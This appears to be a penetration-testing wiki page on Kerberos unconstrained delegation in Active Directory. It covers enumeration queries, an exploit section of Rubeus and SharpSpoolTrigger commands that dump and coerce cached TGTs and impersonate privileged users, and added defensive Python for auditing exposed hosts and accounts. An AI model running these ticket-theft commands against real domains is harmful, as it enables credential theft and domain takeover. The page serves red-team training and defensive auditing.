# Unconstrained Delegation

Unconstrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for **ANY** service on behalf of a user.

The *Trust this computer for delegation to any service (Kerberos only)* privilege must be enabled in the *Delegation* tab within the object/computer's properties.

> Attribute: `userAccountControl` -> `TRUSTED_FOR_DELEGATION` (0x80000, decimal 524288)

<figure><img src="https://3234535347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FkU93ONAZiHsNgO6Mhocr%2Fuploads%2F0AvSGC7NekmjVquDEDcU%2Funconstrained_deleg.png?alt=media&#x26;token=d5003e5b-9fb9-49be-8e96-a01debad544c" alt=""><figcaption><p>Unconstrained Delegation properties<br>[Image From <a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops">CRTO</a>]</p></figcaption></figure>

When unconstrained delegation is enabled on a computer, the Key Distribution Center will include a copy of the user's Ticket Granting Ticket inside the Service Ticket. When a user authenticates to the target service using the Service Ticket, their Ticket Granting Ticket will be cached in memory on the computer hosting the service for future delegation use.

{% hint style="info" %}
The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.
{% endhint %}

## Enumeration

{% tabs %}
{% tab title="impacket-findDelegation" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```fish
findDelegation.py [domain]/[username]:[password]
```

{% endcode %}
{% endtab %}

{% tab title="ldapsearch" %}
{% embed url="https://docs.ldap.com/ldap-sdk/docs/tool-usages/ldapsearch.html" %}

{% code title="Linux (Attacker)" %}

```fish
ldapsearch -x -H ldap://[DC FQDN] \
-D 'user@domain' -w 'Password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' \
dNSHostName sAMAccountName
```

{% endcode %}
{% endtab %}

{% tab title="Get-ADComputer" %}
{% embed url="https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps" %}

{% code title="Windows (PowerShell)" %}

```powershell
Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
```

{% endcode %}
{% endtab %}
{% endtabs %}
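The three enumeration tabs above all key on the same `userAccountControl` bit. The following Python is an added example (not part of the original page, impacket, or the Microsoft tooling) that decodes that bitmask, reproduces the LDAP filter from the `ldapsearch` tab, and separates domain controllers, which carry `TRUSTED_FOR_DELEGATION` by default, from other hosts, which are the ones an audit should flag. The `SAMPLE_RECORDS` are constructed, shaped like the `dNSHostName`/`sAMAccountName`/`userAccountControl` attributes the queries return.

```python
"""Triage computer objects for unconstrained delegation (added example).

Decodes the userAccountControl bitmask, builds the same LDAP filter the
ldapsearch command uses, and splits matching hosts into domain controllers
(expected to have the bit) and everything else (to remediate or watch).
The sample records are constructed, not real directory data.
"""
from __future__ import annotations

# userAccountControl bits (MS-ADTS / MS-SAMR); only the ones relevant here.
UAC_FLAGS = {
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "account is sensitive and cannot be delegated"
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation w/ protocol transition
}

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def unconstrained_delegation_filter() -> str:
    """LDAP filter for computers with TRUSTED_FOR_DELEGATION (524288 == 0x80000)."""
    bit = UAC_FLAGS["TRUSTED_FOR_DELEGATION"]
    return (f"(&(objectCategory=computer)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bit}))")


def triage(records: list[dict]) -> dict[str, list[str]]:
    """Split hosts with unconstrained delegation into domain controllers
    (expected) and other hosts (the audit finding)."""
    result: dict[str, list[str]] = {"domain_controllers": [], "other_hosts": []}
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        if "TRUSTED_FOR_DELEGATION" not in flags:
            continue
        key = "domain_controllers" if "SERVER_TRUST_ACCOUNT" in flags else "other_hosts"
        result[key].append(rec["dNSHostName"])
    return result


# Constructed sample records (assumption: example.local is a placeholder domain).
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "dc01.example.local", "userAccountControl": 0x82000},
    {"sAMAccountName": "SQL$", "dNSHostName": "sql.example.local", "userAccountControl": 0x81000},
    {"sAMAccountName": "WEB$", "dNSHostName": "web.example.local", "userAccountControl": 0x1000},
    {"sAMAccountName": "APP$", "dNSHostName": "app.example.local", "userAccountControl": 0x1001000},
]

if __name__ == "__main__":
    print(unconstrained_delegation_filter())
    for bucket, hosts in triage(SAMPLE_RECORDS).items():
        print(f"{bucket}: {hosts}")
```

Feeding real query output through `triage` gives two lists: domain controllers, which are trusted for delegation by design, and member servers such as `SQL$` in the sample, which should either lose the setting or be treated as Tier 0 assets.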

## Exploit

{% tabs %}
{% tab title="Rubeus (Use Cached TGT)" %}
{% embed url="https://github.com/GhostPack/Rubeus" %}

{% embed url="https://github.com/S3cur3Th1sSh1t/SharpImpersonation" %}

#### Scenario

SQL$ has unconstrained delegation rights, and you have access to a host where the TGT of SQL$ is stored in memory.

The goal is to extract the TGT of a privileged user whose TGT was cached due to recent authentication to SQL$. We can then use the TGT of the privileged user to access any other service.

{% code title="Windows (Target)" %}

```powershell
## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
You must have elevated privileges on the target computer in order to dump TGTs from LSASS.
{% endhint %}
{% endtab %}

{% tab title="Rubeus (Coerce A TGT)" %}
{% embed url="https://github.com/cube0x0/SharpSystemTriggers" %}

{% embed url="https://github.com/GhostPack/Rubeus" %}

{% embed url="https://github.com/S3cur3Th1sSh1t/SharpImpersonation" %}

{% code title="Windows (Target)" %}

```powershell
## Monitor And Extract New TGTs As They Get Cached In The Local Computer
Rubeus.exe monitor /interval:10 /nowrap /runfor:60

## Force Authentication From Target (dc) To Listener (service)
SharpSpoolTrigger.exe dc.weelee.zip service.weelee.zip

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
You must have elevated privileges on the listener (in this case *service.weelee.zip*) in order to monitor for new cached Kerberos Tickets on it.
{% endhint %}
{% endtab %}
{% endtabs %}
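Both scenarios above depend on a privileged user's TGT being cached on the unconstrained host. That only happens when the KDC is willing to issue a delegable TGT for that user, which it refuses for members of *Protected Users* and for accounts with the *Account is sensitive and cannot be delegated* flag (`userAccountControl` bit `NOT_DELEGATED`, 0x100000). The Python below is an added example (not part of the original page or of Rubeus/SharpImpersonation) that takes a list of non-DC hosts with unconstrained delegation, such as the `other_hosts` an audit produces, and reports which privileged accounts are still exposed. The `PRIVILEGED_GROUPS` set and the `SAMPLE_ACCOUNTS` are constructed assumptions.

```python
"""Exposure check for privileged accounts vs. unconstrained delegation (added example).

A TGT can only be captured on an unconstrained host if the account is
delegable: not in Protected Users and without the NOT_DELEGATED flag.
Sample accounts and group names are constructed for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass, field

NOT_DELEGATED = 0x100000  # "Account is sensitive and cannot be delegated"
PROTECTED_USERS = "Protected Users"
# Assumption: groups the organisation treats as privileged.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


@dataclass
class Account:
    sam: str
    user_account_control: int
    member_of: set[str] = field(default_factory=set)

    def is_privileged(self) -> bool:
        return bool(self.member_of & PRIVILEGED_GROUPS)

    def delegation_blocked(self) -> bool:
        """True if the KDC will not issue delegable TGTs for this account."""
        return (PROTECTED_USERS in self.member_of
                or bool(self.user_account_control & NOT_DELEGATED))


def exposed_privileged_accounts(accounts: list[Account],
                                unconstrained_hosts: list[str]) -> list[dict]:
    """Privileged accounts whose TGT could be cached on any of the given hosts.

    Pass only non-DC hosts; domain controllers are trusted for delegation by
    default and are already Tier 0.
    """
    if not unconstrained_hosts:
        return []  # nothing to delegate to, nothing exposed
    findings = []
    for acct in accounts:
        if acct.is_privileged() and not acct.delegation_blocked():
            findings.append({
                "account": acct.sam,
                "hosts": sorted(unconstrained_hosts),
                "fix": "add to Protected Users or set NOT_DELEGATED; "
                       "remove unconstrained delegation from the host",
            })
    return findings


# Constructed sample data (assumption: example.local is a placeholder domain).
SAMPLE_HOSTS = ["sql.example.local"]
SAMPLE_ACCOUNTS = [
    Account("da.alice", 0x200, {"Domain Admins"}),                     # exposed
    Account("da.bob", 0x200, {"Domain Admins", PROTECTED_USERS}),      # protected by group
    Account("svc.backup", 0x200 | NOT_DELEGATED, {"Administrators"}),  # protected by flag
    Account("carol", 0x200, {"Domain Users"}),                         # not privileged
]

if __name__ == "__main__":
    for finding in exposed_privileged_accounts(SAMPLE_ACCOUNTS, SAMPLE_HOSTS):
        print(finding)
```

Run against real directory data, the list this returns is the set of accounts for which a single authentication to a host like `SQL$` would leave a reusable TGT in that host's memory; shrinking it (Protected Users, the sensitive flag, or removing the delegation setting) is what closes the scenario described above.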
